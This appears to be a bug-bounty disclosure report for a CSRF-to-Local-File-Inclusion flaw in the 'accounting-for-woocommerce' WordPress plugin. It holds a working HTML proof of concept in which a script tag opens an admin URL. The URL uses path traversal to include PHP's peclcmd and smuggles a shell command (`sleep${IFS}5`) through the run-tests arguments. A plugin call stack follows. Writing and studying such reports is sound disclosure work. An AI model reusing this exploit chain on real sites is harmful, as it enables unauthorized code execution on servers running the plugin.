vuln to Local File Inclusion

CSRF to Local File Include

Steps to Reproduce

Plugin required to activate:

• woocommerce
• accounting-for-woocommerce

After installing all of that you can visit this html to trigger the LFI:

<script>
open("http://localhost/wp-admin/admin.php?page=woocommerce_accounting_exporter&format=../../../../../../../../../../usr/local/lib/php/peclcmd&x=+run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt")
</script>

call stack

require (\home\dimas\documents\bugbounty\dockerized-wordpress-debug-setup\src\wp-content\plugins\accounting-for-woocommerce\views\export.php:55)
woocommerce_accounting_exporter (\home\dimas\documents\bugbounty\dockerized-wordpress-debug-setup\src\wp-content\plugins\accounting-for-woocommerce\woocommerce-accounting.php:88)
WP_Hook->apply_filters (\home\dimas\documents\bugbounty\dockerized-wordpress-debug-setup\src\wp-includes\class-wp-hook.php:324)
WP_Hook->do_action (\home\dimas\documents\bugbounty\dockerized-wordpress-debug-setup\src\wp-includes\class-wp-hook.php:348)
do_action (\home\dimas\documents\bugbounty\dockerized-wordpress-debug-setup\src\wp-includes\plugin.php:517)
{main} (\home\dimas\documents\bugbounty\dockerized-wordpress-debug-setup\src\wp-admin\admin.php:259)

Additional Information

Environment

This POC use nginx configuration from https://github.com/dimasma0305/dockerized-wordpress-debug-setup